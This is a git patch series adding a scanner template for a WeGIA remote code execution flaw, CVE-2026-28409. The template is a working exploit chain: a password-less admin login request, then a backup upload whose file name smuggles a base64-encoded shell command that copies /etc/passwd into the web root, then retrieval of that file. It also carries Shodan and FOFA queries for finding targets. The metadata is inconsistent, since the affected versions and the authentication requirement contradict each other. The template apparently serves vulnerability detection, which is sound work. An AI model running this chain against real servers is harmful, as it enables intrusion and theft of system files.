From 4675dacf6d5a32373f26ebd780e448c377c7230a Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 17 Apr 2026 12:00:44 +0900 Subject: [PATCH 1/4] Add CVE-2026-28409 for WeGIA remote code execution CVE-2026-28409 details added, highlighting a critical remote code execution vulnerability in WeGIA versions <= 3.6.4. The YAML file includes information on impact, remediation, and example HTTP requests. --- http/cves/CVE-2026-28409.yaml | 114 ++++++++++++++++++++++++++++++++++ 1 file changed, 114 insertions(+) create mode 100644 http/cves/CVE-2026-28409.yaml diff --git a/http/cves/CVE-2026-28409.yaml b/http/cves/CVE-2026-28409.yaml new file mode 100644 index 000000000000..a836a877a01a --- /dev/null +++ b/http/cves/CVE-2026-28409.yaml @@ -0,0 +1,114 @@ +id: CVE-2026-28409 + +info: + name: WeGIA <= 3.6.4 - Remote Code Execution + author: 0x_Akoko + severity: critical + description: | + WeGIA <= 3.6.5 contains a remote code execution caused by improper validation of backup file names in the database restoration functionality, letting attackers with administrative access execute arbitrary OS commands + impact: | + Attackers with admin access can execute arbitrary OS commands, potentially leading to full server compromise. + remediation: | + Upgrade to version 3.6.5 or later. + reference: + - https://cxsecurity.com/issue/WLB-2026030009 + - https://github.com/LabRedesCefetRJ/WeGIA + - https://nvd.nist.gov/vuln/detail/CVE-2026-28409 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: CVE-2026-28409 + cwe-id: CWE-78 + metadata: + verified: true + max-request: 4 + vendor: labredescefetRJ + product: wegia + shodan-query: http.html:"WeGIA" + fofa-query: body="WeGIA" + tags: cve,cve2026,wegia,rce,cmdi,auth-bypass,unauth + +variables: + filename: "{{to_lower(rand_text_alpha(8))}}" + +flow: http(1) && http(2) && http(3) && http(4) + +http: + - raw: + - | + POST /WeGIA/html/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + c=true&cpf=admin&id_pessoa=1 + + extractors: + - type: regex + name: session + part: header + group: 1 + regex: + - 'PHPSESSID=([a-zA-Z0-9]+)' + internal: true + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + internal: true + + - raw: + - | + POST /WeGIA/html/configuracao/importar_dump.php HTTP/1.1 + Host: {{Hostname}} + Cookie: PHPSESSID={{session}} + Content-Type: multipart/form-data; boundary=----test0boundary + + ------test0boundary + Content-Disposition: form-data; name="usuario" + + 1 + ------test0boundary + Content-Disposition: form-data; name="id_pessoa" + + 1 + ------test0boundary + Content-Disposition: form-data; name="import"; filename="dump;export F={{filename}};eval $(echo Y2F0IC9ldGMvcGFzc3dkID4gL3Zhci93d3cvaHRtbC9XZUdJQS8kRi50eHQ= | base64 -d);poc.dump.tar.gz" + Content-Type: application/gzip + + {{hex_decode("1f8b08000000000000030300000000000000000000")}} + ------test0boundary-- + + matchers: + - type: dsl + dsl: + - 'status_code == 302' + internal: true + + - raw: + - | + GET /WeGIA/html/configuracao/gerenciar_backup.php?action=restore&file=dump%3Bexport+F%3D{{filename}}%3Beval+%24%28echo+Y2F0IC9ldGMvcGFzc3dkID4gL3Zhci93d3cvaHRtbC9XZUdJQS8kRi50eHQ%3D+%7C+base64+-d%29%3Bpoc.dump.tar.gz&usuario=1&id_pessoa=1 HTTP/1.1 + Host: {{Hostname}} + Cookie: PHPSESSID={{session}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + internal: true + + - raw: + - | + GET /WeGIA/{{filename}}.txt HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 From a2e8a2124ae4eff38f14119b753386f055f0380f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 17 Apr 2026 12:16:37 +0530 Subject: [PATCH 2/4] Apply suggestion from @neo-by-projectdiscovery-dev[bot] Co-authored-by: neo-by-projectdiscovery-dev[bot] <261965179+neo-by-projectdiscovery-dev[bot]@users.noreply.github.com> --- http/cves/CVE-2026-28409.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/CVE-2026-28409.yaml b/http/cves/CVE-2026-28409.yaml index a836a877a01a..ac76c5c16303 100644 --- a/http/cves/CVE-2026-28409.yaml +++ b/http/cves/CVE-2026-28409.yaml @@ -15,7 +15,8 @@ info: - https://github.com/LabRedesCefetRJ/WeGIA - https://nvd.nist.gov/vuln/detail/CVE-2026-28409 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H +cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H +cvss-score: 7.2 cvss-score: 10.0 cve-id: CVE-2026-28409 cwe-id: CWE-78 From 9cd8a8e78cb68ecfc6dd9d521e89f67885516ebf Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 17 Apr 2026 12:17:52 +0530 Subject: [PATCH 3/4] Update CVE-2026-28409.yaml --- http/cves/CVE-2026-28409.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/http/cves/CVE-2026-28409.yaml b/http/cves/CVE-2026-28409.yaml index ac76c5c16303..43b4ad9989f9 100644 --- a/http/cves/CVE-2026-28409.yaml +++ b/http/cves/CVE-2026-28409.yaml @@ -5,18 +5,17 @@ info: author: 0x_Akoko severity: critical description: | - WeGIA <= 3.6.5 contains a remote code execution caused by improper validation of backup file names in the database restoration functionality, letting attackers with administrative access execute arbitrary OS commands + WeGIA <= 3.6.5 contains a remote code execution caused by improper validation of backup file names in the database restoration functionality, letting attackers with administrative access execute arbitrary OS commands impact: | - Attackers with admin access can execute arbitrary OS commands, potentially leading to full server compromise. + Attackers with admin access can execute arbitrary OS commands, potentially leading to full server compromise. remediation: | - Upgrade to version 3.6.5 or later. + Upgrade to version 3.6.5 or later. reference: - https://cxsecurity.com/issue/WLB-2026030009 - https://github.com/LabRedesCefetRJ/WeGIA - https://nvd.nist.gov/vuln/detail/CVE-2026-28409 classification: -cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H -cvss-score: 7.2 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cve-id: CVE-2026-28409 cwe-id: CWE-78 From f4933970c743dbe3b96eca457bb1b85b99fa4071 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 21 Apr 2026 23:27:05 +0530 Subject: [PATCH 4/4] Update and rename http/cves/CVE-2026-28409.yaml to http/cves/2026/CVE-2026-28409.yaml --- http/cves/{ => 2026}/CVE-2026-28409.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename http/cves/{ => 2026}/CVE-2026-28409.yaml (98%) diff --git a/http/cves/CVE-2026-28409.yaml b/http/cves/2026/CVE-2026-28409.yaml similarity index 98% rename from http/cves/CVE-2026-28409.yaml rename to http/cves/2026/CVE-2026-28409.yaml index 43b4ad9989f9..013f446f8fc4 100644 --- a/http/cves/CVE-2026-28409.yaml +++ b/http/cves/2026/CVE-2026-28409.yaml @@ -26,7 +26,7 @@ info: product: wegia shodan-query: http.html:"WeGIA" fofa-query: body="WeGIA" - tags: cve,cve2026,wegia,rce,cmdi,auth-bypass,unauth + tags: cve,cve2026,wegia,rce variables: filename: "{{to_lower(rand_text_alpha(8))}}"